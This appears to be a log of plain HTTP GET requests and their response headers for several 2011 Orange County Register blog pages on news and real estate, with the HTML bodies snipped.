<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/ HTTP/1.1 Host: inyourface.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:05:49 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie Last-Modified: Thu, 03 Feb 2011 19:04:54 +0000 Cache-Control: max-age=245, must-revalidate X-Pingback: http://inyourface.ocregister.com/xmlrpc.php Link: <http://inyourface.ocregister.com/?p=25744>; rel=shortlink Connection: close Content-Type: text/html Content-Length: 84762
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/02/oceanfront-with-killer-views-a-deal/14224/ HTTP/1.1 Host: lagunahomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:05:56 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php Link: <http://lagunahomes.ocregister.com/?p=14224>; rel=shortlink Last-Modified: Thu, 03 Feb 2011 19:05:57 +0000 Cache-Control: max-age=300, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/ HTTP/1.1 Host: lagunahomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:05:54 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie Last-Modified: Thu, 03 Feb 2011 19:05:33 +0000 Cache-Control: max-age=279, must-revalidate X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php Link: <http://lagunahomes.ocregister.com/?p=14020>; rel=shortlink Connection: close Content-Type: text/html Content-Length: 53064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/02/a-new-home-for-kobe-bryant/97596/ HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:01 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie Last-Modified: Thu, 03 Feb 2011 19:02:32 +0000 Cache-Control: max-age=91, must-revalidate X-Pingback: http://lansner.ocregister.com/xmlrpc.php Link: <http://lansner.ocregister.com/?p=97596>; rel=shortlink Connection: close Content-Type: text/html Content-Length: 115709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/02/homebuilding-slump-now-3-years-old/98070/ HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:01 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie Last-Modified: Thu, 03 Feb 2011 19:04:27 +0000 Cache-Control: max-age=206, must-revalidate X-Pingback: http://lansner.ocregister.com/xmlrpc.php Link: <http://lansner.ocregister.com/?p=98070>; rel=shortlink Connection: close Content-Type: text/html Content-Length: 101944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/03/orange-county-property/98182/ HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:01 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie Last-Modified: Thu, 03 Feb 2011 19:02:02 +0000 Cache-Control: max-age=61, must-revalidate X-Pingback: http://lansner.ocregister.com/xmlrpc.php Link: <http://lansner.ocregister.com/?p=98182>; rel=shortlink Connection: close Content-Type: text/html Content-Length: 140260
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /category/outlooks/eyeball-11/ HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:03 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>